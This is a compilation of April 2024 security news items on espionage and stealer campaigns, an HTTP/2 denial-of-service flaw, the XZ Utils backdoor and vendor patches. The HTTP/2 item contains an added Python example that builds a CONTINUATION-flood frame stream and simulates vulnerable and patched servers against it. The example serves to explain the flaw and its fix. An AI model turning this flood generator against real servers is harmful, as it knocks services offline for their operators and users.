"BRICKSTORM is a Go backdoor targeting VMware vCenter servers," Mandiant researchers explained. "It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying."
The last among the five China-based groups tied to the abuse of Ivanti security flaws is UNC5291, which Mandiant said likely has associations with another hacking group UNC3236 (aka Volt Typhoon), primarily owing to its targeting of academic, energy, defense, and health sectors.
"Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024," the company said.
The findings once again underscore the threat faced by edge appliances, with the espionage actors utilizing a combination of zero-day flaws, open-source tooling, and custom backdoors to tailor their tradecraft depending on their targets to evade detection for extended periods of time.
Vietnam-Based Hackers Steal Financial Data Across Asia with Malware
5.4.24
APT
The Hacker News
A suspected Vietnamese-origin
threat actor has been observed targeting victims in several Asian and Southeast
Asian countries with malware designed to harvest valuable data since at least
May 2023.
Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. Targets of the campaign include India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
"This group focuses on stealing victims' credentials, financial data, and social media accounts, including business and advertisement accounts," security researchers Chetan Raghuprasad and Joey Chen said. "They use RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads."
Other commodity malware used by the group comprises a combination of remote access trojans and information stealers such as AsyncRAT, NetSupport RAT, and Rhadamanthys.
The targeting of business and advertisement accounts has been of particular focus for attackers operating out of Vietnam, with various stealer malware families like Ducktail, NodeStealer, and VietCredCare deployed to take control of the accounts for further monetization.
The modus operandi entails the use of Telegram to exfiltrate the stolen information from victim machines, which is then traded in underground markets to generate illicit revenues.
"CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries," the researchers said.
Attack chains start with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to the targets.
Should the LNK file be opened, an HTML application (HTA) file is downloaded and
executed from an attacker-controlled download server, which, in turn, runs an
embedded Visual Basic script.
The script, for its part, decrypts and sequentially executes three other PowerShell scripts that are responsible for performing anti-VM and anti-analysis checks, circumventing Windows User Account Control (UAC), disabling Windows and application notifications, and downloading and running RotBot.
RotBot is configured to contact a Telegram bot and retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers like Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera; Discord and Telegram data; and screenshots.
XClient is also engineered to siphon data from victims' Facebook, Instagram, TikTok and YouTube accounts, gathering details about the payment methods and permissions associated with their Facebook business and ads accounts.
"RotBot is a variant of the Quasar RAT client that the threat actor has customized and compiled for this campaign," the researchers said. "[XClient] has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks."
The development comes as Bitdefender disclosed details of a malvertising campaign on Facebook that's taking advantage of the buzz surrounding generative AI tools to push an assortment of information stealers like Rilide, Vidar, IceRAT, and a new entrant known as Nova Stealer.
The starting point of the attack is the threat actor taking over an existing Facebook account and modifying its appearance to mimic well-known AI tools from Google, OpenAI, and Midjourney, and expanding their reach by running sponsored ads on the platform.
One such imposter page masquerading as Midjourney had 1.2 million followers before it was taken down on March 8, 2023. The threat actors managing the page were mainly from Vietnam, the U.S., Indonesia, the U.K., and Australia, among others.
"The malvertising campaigns have tremendous reach through Meta's sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere," the Romanian cybersecurity company said.
New Phishing Campaign Targets Oil & Gas with Evolved Data-Stealing Malware
5.4.24
Phishing
The Hacker News
An updated version of an
information-stealing malware called Rhadamanthys is being used in phishing
campaigns targeting the oil and gas sector.
"The phishing emails use a unique vehicle incident lure and, in later stages of the infection chain, spoof the Federal Bureau of Transportation in a PDF that mentions a significant fine for the incident," Cofense researcher Dylan Duncan said.
The email message comes with a malicious link that leverages an open redirect flaw to take the recipients to a link hosting a supposed PDF document, but, in reality, is an image that, upon clicking, downloads a ZIP archive with the stealer payload.
Written in C++, Rhadamanthys is designed to establish connections with a command-and-control (C2) server in order to harvest sensitive data from the compromised hosts.
"This campaign appeared within days of the law enforcement takedown of the LockBit ransomware group," Duncan said. "While this could be a coincidence, Trend Micro revealed in August 2023 a Rhadamanthys variant that came bundled with a leaked LockBit payload, alongside a clipper malware and cryptocurrency miner."
"The threat actors added a combination of an information stealer and a LockBit
ransomware variant in a single Rhadamanthys bundle, possibly indicating the
continued evolution of the malware," the company noted.
The development comes amid a steady stream of new stealer malware families like Sync-Scheduler and Mighty Stealer, even as existing strains like StrelaStealer are evolving with improved obfuscation and anti-analysis techniques.
It also follows the emergence of a malspam campaign targeting Indonesia that
employs banking-related lures to propagate the Agent Tesla malware to plunder
sensitive information such as login credentials, financial data, and personal
documents.
Agent Tesla phishing campaigns observed in November 2023 have also set their sights on Australia and the U.S., according to Check Point, which attributed the operations to two African-origin threat actors tracked as Bignosa (aka Nosakhare Godson and Andrei Ivan) and Gods (aka GODINHO or Kmarshal or Kingsley Fredrick), the latter of whom works as a web designer.
"The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said.
The Agent Tesla malware distributed via these attack chains has been found to be protected by Cassandra Protector, a tool that shields software programs against reverse-engineering or modification efforts. The messages are sent via the open-source webmail tool Roundcube.
"As seen from the description of these threat actors' actions, no rocket science degree is required to conduct the cyber crime operations behind one of the most prevalent malware families in the last several years," Check Point said.
"It's an unfortunate course of events caused by the low-entry level threshold so that anyone willing to provoke victims to launch the malware via spam campaigns can do so."
New HTTP/2 Vulnerability Exposes Web Servers to DoS Attacks
4.4.24
Hacking
The Hacker News
New research has found that the
CONTINUATION frame in the HTTP/2 protocol can be exploited to conduct
denial-of-service (DoS) attacks.
The technique has been codenamed HTTP/2 CONTINUATION Flood by security researcher Bartek Nowotarski, who reported the issue to the CERT Coordination Center (CERT/CC) on January 25, 2024.
"Many HTTP/2 implementations do not properly limit or sanitize the amount of CONTINUATION frames sent within a single stream," CERT/CC said in an advisory on April 3, 2024.
"An attacker that can send packets to a target server can send a stream of CONTINUATION frames that will not be appended to the header list in memory but will still be processed and decoded by the server or will be appended to the header list, causing an out of memory (OOM) crash."
Like HTTP/1, HTTP/2 carries header fields within requests and responses. These header fields form a header list, which is serialized (HPACK-encoded) into a header block. The header block is then split into header block fragments, each transmitted in a HEADERS frame or in one of the CONTINUATION frames that follow it.
"The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments," the documentation for RFC 7540 reads.
"Any number of CONTINUATION frames can be sent, as long as the preceding frame is on the same stream and is a HEADERS, PUSH_PROMISE, or CONTINUATION frame without the END_HEADERS flag set."
The last frame containing headers will have the END_HEADERS flag set, which signals the remote endpoint that it's the end of the header block.
According to Nowotarski, CONTINUATION Flood is a class of vulnerabilities within several HTTP/2 protocol implementations that pose a more severe threat compared to the Rapid Reset attack that came to light in October 2023.
"A single machine (and in certain instances, a mere single TCP connection or a handful of frames) has the potential to disrupt server availability, with consequences ranging from server crashes to substantial performance degradation," the researcher said. "Remarkably, requests that constitute an attack are not visible in HTTP access logs."
The vulnerability, at its core, has to do with incorrect handling of HEADERS and multiple CONTINUATION frames that pave the way for a DoS condition.
In other words, an attacker can initiate a new HTTP/2 stream against a target server using a vulnerable implementation and send HEADERS and CONTINUATION frames with no set END_HEADERS flag, creating a never-ending stream of headers that the HTTP/2 server would need to parse and store in memory.
While the exact outcome varies depending on the implementation, impacts range from instant crash after sending a couple of HTTP/2 frames and out of memory crash to CPU exhaustion, thereby affecting server availability.
"RFC 9113 [...] mentions multiple security issues that may arise if CONTINUATION frames are not handled correctly," Nowotarski said.
"At the same time, it does not mention a specific case in which CONTINUATION frames are sent without the final END_HEADERS flag which can have repercussions on affected servers."
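To make the frame sequence concrete, here is an added Python example (not from the researcher's report or from any of the affected projects) that serialises HTTP/2 frames with the layout from RFC 9113 section 4.1, generates the attacker's HEADERS-without-END_HEADERS followed by CONTINUATION frames, and runs both the vulnerable accumulation (the buffer grows for as long as the peer keeps sending) and the patched behaviour (the connection is closed once the assembled header block or the CONTINUATION count exceeds a limit). The limits and the filler fragment are constructed; HPACK decoding is out of scope, so fragments are treated as opaque bytes.

```python
import struct

HEADERS = 0x1          # frame type
CONTINUATION = 0x9     # frame type
END_HEADERS = 0x4      # flag: this frame ends the header block
FRAME_HEADER_LEN = 9


class ProtocolError(Exception):
    """Raised where a real server would send GOAWAY and drop the connection."""


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """Serialize one frame: 24-bit length, 8-bit type, 8-bit flags,
    1 reserved bit + 31-bit stream id, then the payload."""
    if len(payload) >= 1 << 24:
        raise ValueError("payload too large for a frame")
    header = struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
    header += struct.pack(">I", stream_id & 0x7FFFFFFF)
    return header + payload


def iter_frames(data: bytes):
    """Yield (type, flags, stream_id, payload) for each frame in data."""
    off = 0
    while off + FRAME_HEADER_LEN <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = struct.unpack(">I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        start = off + FRAME_HEADER_LEN
        yield ftype, flags, stream_id, data[start:start + length]
        off = start + length


def continuation_flood(stream_id: int, n_frames: int, fragment: bytes) -> bytes:
    """Attacker side: HEADERS without END_HEADERS, then n_frames CONTINUATION
    frames that never set END_HEADERS, so the header block never terminates.
    The fragment is constructed filler (a real attack can send anything)."""
    out = frame(HEADERS, 0, stream_id, fragment)
    for _ in range(n_frames):
        out += frame(CONTINUATION, 0, stream_id, fragment)
    return out


class HeaderBlockCollector:
    """Server-side assembly of one stream's header block.

    With both limits None this is the vulnerable behaviour: fragments are
    appended until the peer stops. With limits set, the connection is torn
    down as soon as the assembled block or the CONTINUATION count exceeds
    them, which is what the patched implementations do."""

    def __init__(self, max_block_bytes=None, max_continuations=None):
        self.max_block_bytes = max_block_bytes
        self.max_continuations = max_continuations
        self.buffer = bytearray()
        self.stream_id = None
        self.continuations = 0

    def feed(self, ftype, flags, stream_id, payload):
        """Feed one frame; return the complete block on END_HEADERS, else None."""
        if self.stream_id is None:
            if ftype != HEADERS:
                raise ProtocolError("header block must begin with HEADERS")
            self.stream_id = stream_id
        else:
            if ftype != CONTINUATION or stream_id != self.stream_id:
                raise ProtocolError("expected CONTINUATION on stream %d" % self.stream_id)
            self.continuations += 1
            if self.max_continuations is not None and self.continuations > self.max_continuations:
                raise ProtocolError("too many CONTINUATION frames")
        self.buffer += payload
        if self.max_block_bytes is not None and len(self.buffer) > self.max_block_bytes:
            raise ProtocolError("header block exceeds %d bytes" % self.max_block_bytes)
        if flags & END_HEADERS:
            block = bytes(self.buffer)
            self.buffer, self.stream_id, self.continuations = bytearray(), None, 0
            return block
        return None


def run_server(data: bytes, **limits):
    """Drive a collector over a byte stream. Returns ('ok', block) when a
    header block completed, ('rejected', reason) when a limit tripped, or
    ('buffering', bytes_held) when the data ran out before END_HEADERS."""
    collector = HeaderBlockCollector(**limits)
    try:
        for f in iter_frames(data):
            block = collector.feed(*f)
            if block is not None:
                return ("ok", block)
    except ProtocolError as exc:
        return ("rejected", str(exc))
    return ("buffering", len(collector.buffer))


if __name__ == "__main__":
    flood = continuation_flood(1, 1000, b"\x00" * 1024)
    print("unlimited:", run_server(flood))
    print("16 KiB cap:", run_server(flood, max_block_bytes=16384))
```

Two details from the description above are visible here: nothing is ever logged because no request completes, and the cost is paid per stream, so a single connection is enough. Bounding the assembled header block (most implementations already advertise SETTINGS_MAX_HEADER_LIST_SIZE; the fix is to enforce an equivalent bound on the raw fragments before decoding) and capping the number of CONTINUATION frames per block both close the hole.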
The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758).
Users are recommended to upgrade affected software to the latest version to mitigate potential threats. In the absence of a fix, it's advised to consider temporarily disabling HTTP/2 on the server.
Ivanti Rushes Patches for 4 New Flaws in Connect Secure and Policy Secure
4.4.24
Vulnerability
The Hacker News
Ivanti has released security
updates to address four security flaws impacting Connect Secure and Policy
Secure Gateways that could result in code execution and denial-of-service (DoS).
The list of flaws is as follows -
CVE-2024-21894 (CVSS score: 8.2) - A heap overflow vulnerability in the IPSec component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in order to crash the service thereby causing a DoS attack. In certain conditions, this may lead to execution of arbitrary code.
CVE-2024-22052 (CVSS score: 7.5) - A null pointer dereference vulnerability in IPSec component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in order to crash the service thereby causing a DoS attack.
CVE-2024-22053 (CVSS score: 8.2) - A heap overflow vulnerability in the IPSec component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in order to crash the service thereby causing a DoS attack or in certain conditions read contents from memory.
CVE-2024-22023 (CVSS score: 5.3) - An XML entity expansion or XEE vulnerability in SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated attacker to send specially crafted XML requests in order to temporarily cause resource exhaustion thereby resulting in a limited-time DoS.
The company,
which has been grappling with a steady stream of security flaws in its products
since the start of the year, said it's not aware of "any customers being
exploited by these vulnerabilities at the time of disclosure."
Late last month, Ivanti shipped patches for a critical shortcoming in its Standalone Sentry product (CVE-2023-41724, CVSS score: 9.6) that could permit an unauthenticated threat actor to execute arbitrary commands on the underlying operating system.
It also resolved another critical flaw impacting on-premises versions of Neurons for ITSM (CVE-2023-46808, CVSS score: 9.9) that an authenticated remote attacker could abuse in order to perform arbitrary file writes and obtain code execution.
In an open letter published on April 3, 2024, Ivanti's CEO Jeff Abbott said the company is taking a "close look" at its own posture and processes to meet the requirements of the current threat landscape.
Abbott also said "events in recent months have been humbling" and that it's executing a plan that essentially changes its security operating model by adopting secure-by-design principles, sharing information with customers with complete transparency, and rearchitecting its engineering, security, and vulnerability management practices.
"We are intensifying our internal scanning, manual exploitation and testing capabilities, engaging trusted third parties to augment our internal research and facilitating responsible disclosure of vulnerabilities with increased incentives around an enhanced bug bounty program," Abbott said.
Google Warns: Android Zero-Day Flaws in Pixel Phones Exploited by Forensic Companies
4.4.24
OS
The Hacker News
Google has disclosed that two
Android security flaws impacting its Pixel smartphones have been exploited in
the wild by forensic companies.
The high-severity zero-day vulnerabilities are as follows -
CVE-2024-29745 - An information disclosure flaw in the bootloader component
CVE-2024-29748 - A privilege escalation flaw in the firmware component
"There are indications that the [vulnerabilities] may be under limited, targeted exploitation," Google said in an advisory published April 2, 2024.
While the tech giant did not reveal any other information about the nature of the attacks exploiting these shortcomings, the maintainers of GrapheneOS said they "are being actively exploited in the wild by forensic companies."
"CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," they said in a series of posts on X (formerly Twitter).
"Forensic companies are rebooting devices in After First Unlock state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory."
GrapheneOS noted that CVE-2024-29748 could be weaponized by local attackers to interrupt a factory reset triggered via the device admin API.
The disclosure comes more than two months after the GrapheneOS team revealed that forensic companies are exploiting firmware vulnerabilities that impact Google Pixel and Samsung Galaxy phones to steal data and spy on users when the device is not at rest.
It also urged Google to introduce an auto-reboot feature to make exploitation of firmware flaws more difficult.
U.S. Cyber Safety Board Slams Microsoft Over Breach by China-Based Hackers
4.4.24
APT
The Hacker News
The U.S. Cyber Safety Review Board (CSRB) has criticized Microsoft for a series of security lapses that led to the breach of nearly two dozen companies across Europe and the U.S. by a China-based nation-state group called Storm-0558 last year.
The findings, released by the Department of Homeland Security (DHS) on Tuesday, found that the intrusion was preventable, and that it became successful due to a "cascade of Microsoft's avoidable errors."
"It identified a series of Microsoft operational and strategic decisions that collectively pointed to a corporate culture that deprioritized enterprise security investments and rigorous risk management, at odds with the company's centrality in the technology ecosystem and the level of trust customers place in the company to protect their data and operations," the DHS said in a statement.
The CSRB also lambasted the tech titan for failing to detect the compromise on its own, instead relying on a customer to reach out to flag the breach. It further faulted Microsoft for not prioritizing the development of an automated key rotation solution and rearchitecting its legacy infrastructure to meet the needs of the current threat landscape.
The incident first came to light in July 2023 when Microsoft revealed that Storm-0558 gained unauthorized access to 22 organizations as well as more than 500 related individual consumer accounts.
Microsoft subsequently said a validation error in its source code made it possible for Azure Active Directory (Azure AD) tokens to be forged by Storm-0558 using a Microsoft account (MSA) consumer signing key, thus allowing the adversary to infiltrate the mailboxes.
In September 2023, the company divulged that Storm-0558 acquired the consumer signing key to forge the tokens by compromising an engineer's corporate account that had access to a debugging environment hosting a crash dump of its consumer signing system that also inadvertently contained the signing key.
Microsoft has since acknowledged in a March 2024 update that this explanation was inaccurate and that it has still not been able to locate a "crash dump containing the impacted key material." It also said its investigation into the hack remains ongoing.
"Our leading hypothesis remains that operational errors resulted in key material leaving the secure token signing environment that was subsequently accessed in a debugging environment via a compromised engineering account," it noted.
"Recent events have demonstrated a need to adopt a new culture of engineering security in our own networks," a Microsoft spokesperson was quoted as saying to The Washington Post.
As many as 60,000 unclassified emails from Outlook accounts are believed to have been exfiltrated over the course of the campaign that began in May 2023. China has rejected accusations that it was behind the attack.
Earlier this February, Redmond expanded free logging capabilities to all U.S. federal agencies using Microsoft Purview Audit, irrespective of the license tier, to help them detect, respond, and prevent sophisticated cyber attacks.
"The threat actor responsible for this brazen intrusion has been tracked by industry for over two decades and has been linked to 2009 Operation Aurora and 2011 RSA SecurID compromises," said CSRB Acting Deputy Chair Dmitri Alperovitch.
"This People's Republic of China affiliated group of hackers has the capability and intent to compromise identity systems to access sensitive data, including emails of individuals of interest to the Chinese government."
To safeguard against threats from state-sponsored actors, cloud service providers have been recommended to -
Implement modern control mechanisms and baseline practices
Adopt a minimum standard for default audit logging in cloud services
Incorporate emerging digital identity standards to secure cloud services
Adopt incident and vulnerability disclosure practices to maximize transparency
Develop more effective victim notification and support mechanisms to drive information-sharing efforts
"The United States government should update the Federal Risk Authorization Management Program and supporting frameworks and establish a process for conducting discretionary special reviews of the program's authorized Cloud Service Offerings following especially high-impact situations," the CSRB said.
Google Chrome Beta Tests New DBSC Protection Against Cookie-Stealing Attacks
3.4.24
Safety
The Hacker News
Google on Tuesday said it's piloting a new feature in Chrome called Device Bound Session Credentials (DBSC) to help protect users against session cookie theft by malware.
The prototype – currently tested against "some" Google Account users running Chrome Beta – is built with an aim to make it an open web standard, the tech giant's Chromium team said.
"By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value," the company noted.
"We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices."
The development comes on the back of reports that off-the-shelf information-stealing malware is finding ways to steal cookies in a manner that allows threat actors to bypass multi-factor authentication (MFA) protection and gain unauthorized access to online accounts.
Such session hijacking techniques are not new. In October 2021, Google's Threat Analysis Group (TAG) detailed a phishing campaign that targeted YouTube content creators with cookie stealing malware to hijack their accounts and monetize the access for perpetrating cryptocurrency scams.
Earlier this January, CloudSEK revealed that information stealers like Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake have updated their capabilities to hijack user sessions and allow continuous access to Google services even after a password reset.
Google told The Hacker News at the time that "attacks involving malware that steal cookies and tokens are not new; we routinely upgrade our defenses against such techniques and to secure users who fall victim to malware."
It further recommended that users enable Enhanced Safe Browsing in the Chrome web browser to protect against phishing and malware downloads.
DBSC aims to cut down on such malicious efforts by introducing a cryptographic approach that ties sessions to the device, making it harder for adversaries to abuse stolen cookies and hijack accounts.
Offered via an API, the new feature achieves this by allowing a server to associate a session with a public key created by the browser as part of a public/private key pair when a new session is launched.
It's worth noting that the key pair is stored locally on the device using Trusted Platform Modules (TPMs). In addition, the DBSC API permits the server to verify proof-of-possession of the private key throughout the session lifetime to ensure the session is active on the same device.
"DBSC offers an API for websites to control the lifetime of such keys, behind the abstraction of a session, and a protocol for periodically and automatically proving possession of those keys to the website's servers," Google's Kristian Monsen and Arnar Birgisson said.
"There is a separate key for each session, and it should not be possible to detect that two different session keys are from one device. By device-binding the private key and with appropriate intervals of the proofs, the browser can limit malware's ability to offload its abuse off of the user's device, significantly increasing the chance that either the browser or server can detect and mitigate cookie theft."
One crucial caveat is that DBSC banks on user devices having a secure way of signing challenges while protecting private keys from exfiltration by malware, necessitating that the web browser has access to the TPM.
Google said support for DBSC will be initially rolled out to roughly half of Chrome's desktop users based on the hardware capabilities of their machines. The latest project is also expected to be in sync with the company's broader plans to sunset third-party cookies in the browser by the end of the year via the Privacy Sandbox initiative.
"This is to make sure that DBSC does not become a new tracking vector once third-party cookies are phased out, while also ensuring that such cookies can be fully protected in the meantime," it said. "If the user completely opts out of cookies, third-party cookies, or cookies for a specific site, this will disable DBSC in those scenarios as well."
The company further noted that it's engaging with several server providers, identity providers (IdPs), and browser vendors like Microsoft Edge and Okta, who have expressed interest in DBSC. Origin trials for DBSC for all supported websites are set to commence by the end of the year.
Mispadu Trojan Targets Europe, Thousands of Credentials Compromised
3.4.24
Virus
The Hacker News
The banking trojan known as Mispadu has expanded its focus beyond Latin America (LATAM) and Spanish-speaking individuals to target users in Italy, Poland, and Sweden.
Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities, according to Morphisec.
"Despite the geographic expansion, Mexico remains the primary target," security researcher Arnold Osipov said in a report published last week.
"The campaign has resulted in thousands of stolen credentials, with records dating back to April 2023. The threat actor leverages these credentials to orchestrate malicious phishing emails, posing a significant threat to recipients."
Mispadu, also called URSA, came to light in 2019, when it was observed carrying out credential theft activities aimed at financial institutions in Brazil and Mexico by displaying fake pop-up windows. The Delphi-based malware is also capable of taking screenshots and capturing keystrokes.
Typically distributed via spam emails, recent attack chains have leveraged a now-patched Windows SmartScreen security bypass flaw (CVE-2023-36025, CVSS score: 8.8) to compromise users in Mexico.
The infection sequence analyzed by Morphisec is a multi-stage process that commences with a PDF attachment present in invoice-themed emails that, when opened, prompts the recipient to click on a booby-trapped link to download the complete invoice, resulting in the download of a ZIP archive.
The ZIP comes with either an MSI installer or an HTA script that's responsible for retrieving and executing a Visual Basic Script (VBScript) from a remote server, which, in turn, downloads a second VBScript that ultimately downloads and launches the Mispadu payload using an AutoIT script but after it's decrypted and injected into memory by means of a loader.
"This [second] script is heavily obfuscated and employs the same decryption algorithm as mentioned in the DLL," Osipov said.
"Before downloading and invoking the next stage, the script conducts several Anti-VM checks, including querying the computer's model, manufacturer, and BIOS version, and comparing them to those associated with virtual machines."
The Mispadu attacks are also characterized by the use of two distinct command-and-control (C2) servers, one for fetching the intermediate and final-stage payloads and another for exfiltrating the stolen credentials from over 200 services. There are currently more than 60,000 files in the server.
The development comes as the DFIR Report detailed a February 2023 intrusion that entailed the abuse of malicious Microsoft OneNote files to drop IcedID, using it to drop Cobalt Strike, AnyDesk, and the Nokoyawa ransomware.
Microsoft, exactly a year ago, announced that it would start blocking 120 extensions embedded within OneNote files to prevent its abuse for malware delivery.
YouTube Videos for Game Cracks Serve Malware
The findings also come as enterprise security firm Proofpoint said several YouTube channels promoting cracked and pirated video games are acting as a conduit to deliver information stealers such as Lumma Stealer, Stealc, and Vidar by adding malicious links to video descriptions.
"The videos purport to show an end user how to do things like download software or upgrade video games for free, but the link in the video descriptions leads to malware," security researcher Isaac Shaughnessy said in an analysis published today.
There is evidence to suggest that such videos are posted from compromised accounts, but there is also the possibility that the threat actors behind the operation have created short-lived accounts for dissemination purposes.
All the videos include Discord and MediaFire URLs that point to password-protected archives that ultimately lead to the deployment of the stealer malware.
Proofpoint said it identified multiple distinct activity clusters propagating stealers via YouTube with an aim to single out non-enterprise users. The campaign has not been attributed to a single threat actor or group.
"The techniques used are similar, however, including the use of video descriptions to host URLs leading to malicious payloads and providing instructions on disabling antivirus, and using similar file sizes with bloating to attempt to bypass detections," Shaughnessy said.
Critical Security Flaw Found in Popular LayerSlider WordPress Plugin
3.4.24
Vulnerability
The Hacker News
A critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.
The flaw, designated as CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.
The issue has been addressed in version 7.10.1 released on March 27, 2024, following responsible disclosure on March 25. "This update includes important security fixes," the maintainers of LayerSlider said in their release notes.
LayerSlider is a visual web content editor, graphic design software, and digital visual effects tool that allows users to create animations and rich content for their websites. According to its own site, the plugin is used by "millions of users worldwide."
The flaw discovered in the tool stems from a case of insufficient escaping of user supplied parameters and the absence of wpdb::prepare(), enabling unauthenticated attackers to append additional SQL queries and glean sensitive information, Wordfence said.
The development follows the discovery of an unauthenticated stored cross-site scripting (XSS) flaw in the WP-Members Membership Plugin (CVE-2024-1852, CVSS score: 7.2) that could facilitate the execution of arbitrary JavaScript code. It has been resolved in version 3.4.9.3.
The vulnerability, due to insufficient input sanitization and output escaping, "makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page which is the edit users page," the WordPress security company said.
Should the code be executed in the context of an administrator's browser session, it can be used to create rogue user accounts, redirect site visitors to other malicious sites, and carry out other attacks, it added.
Over the past few weeks, security vulnerabilities have also been disclosed in other WordPress plugins such as Tutor LMS (CVE-2024-1751, CVSS score: 8.8) and Contact Form Entries (CVE-2024-2030, CVSS score: 6.4) that could be exploited for information disclosure and injecting arbitrary web scripts, respectively.
Malicious Code in XZ Utils for Linux Systems Enables Remote Code Execution
2.4.24
Virus
The Hacker News
The malicious code inserted into the open-source library XZ Utils, a widely used package present in major Linux distributions, is also capable of facilitating remote code execution, a new analysis has revealed.
The audacious supply chain compromise, tracked as CVE-2024-3094 (CVSS score: 10.0), came to light last week when Microsoft engineer and PostgreSQL developer Andres Freund alerted to the presence of a backdoor in the data compression utility that gives remote attackers a way to sidestep secure shell authentication and gain complete access to an affected system.
XZ Utils is a command-line tool for compressing and decompressing data in Linux and other Unix-like operating systems.
The malicious code is said to have been deliberately introduced by one of the project maintainers named Jia Tan (aka Jia Cheong Tan or JiaT75) in what appears to be a meticulous attack spanning multiple years. The GitHub user account was created in 2021. The identity of the actor(s) is presently unknown.
"The threat actor started contributing to the XZ project almost two years ago, slowly building credibility until they were given maintainer responsibilities," Akamai said in a report.
In a further act of clever social engineering, sockpuppet accounts like Jigar Kumar and Dennis Ens are believed to have been used to send feature requests and report a variety of issues in the software in order to force the original maintainer – Lasse Collin of the Tukaani Project – to add a new co-maintainer to the repository.
Enter Jia Tan, who introduced a series of changes to XZ Utils in 2023, which eventually made their way to release version 5.6.0 in February 2024. They also harbored a sophisticated backdoor.
Source: Thomas Roccia
"As I have hinted in earlier emails, Jia Tan may have a bigger role in the project in the future," Collin said in an exchange with Kumar in June 2022.
"He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils."
The backdoor affects XZ Utils 5.6.0 and 5.6.1 release tarballs, the latter of which contains an improved version of the same implant. Collin has since acknowledged the project's breach, stating both the tarballs were created and signed by Jia Tan and that they had access only to the now-disabled GitHub repository.
"This is clearly a very complex state-sponsored operation with impressive sophistication and multi-year planning," firmware security company Binarly said. "Such a complex and professionally designed comprehensive implantation framework is not developed for a one-shot operation."
A deeper examination of the backdoor by open-source cryptographer Filippo Valsorda has also revealed that the affected versions allow specific remote attackers to send arbitrary payloads through an SSH certificate which will be executed in a manner that circumvents authentication protocols, effectively seizing control over the victim machine.
"It appears as though the backdoor is added to the SSH daemon on the vulnerable machine, enabling a remote attacker to execute arbitrary code," Akamai said. "This means that any machine with the vulnerable package that exposes SSH to the internet is potentially vulnerable."
Needless to say, the accidental discovery by Freund is one of the most significant supply chain attacks discovered to date and could have been a severe security disaster had the package been integrated into stable releases of Linux distributions.
"The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said.
As with the case of Apache Log4j, the incident once again highlights the reliance on open-source software and volunteer-run projects, and the consequences that could entail should they suffer a compromise or have a major vulnerability.
"The bigger 'fix' is for organizations to adopt tools and processes that allow them to identify signs of tampering and malicious features within both open source and commercial code used in their own development pipeline," ReversingLabs said.
China-linked Hackers Deploy New 'UNAPIMON' Malware for Stealthy Operations
2.4.24
APT
The Hacker News
A threat activity cluster tracked as Earth Freybug has been observed using a new malware called UNAPIMON to fly under the radar.
"Earth Freybug is a cyberthreat group that has been active since at least 2012 that focuses on espionage and financially motivated activities," Trend Micro security researcher Christopher So said in a report published today.
"It has been observed to target organizations from various sectors across different countries."
The cybersecurity firm has described Earth Freybug as a subset within APT41, a China-linked cyber espionage group that's also tracked as Axiom, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti.
The adversarial collective is known to rely on a combination of living-off-the-land binaries (LOLBins) and custom malware to realize its goals. Also adopted are techniques like dynamic-link library (DLL) hijacking and application programming interface (API) unhooking.
Trend Micro said the activity shares tactical overlaps with a cluster previously disclosed by cybersecurity company Cybereason under the name Operation CuckooBees, which refers to an intellectual property theft campaign targeting technology and manufacturing companies located in East Asia, Western Europe, and North America.
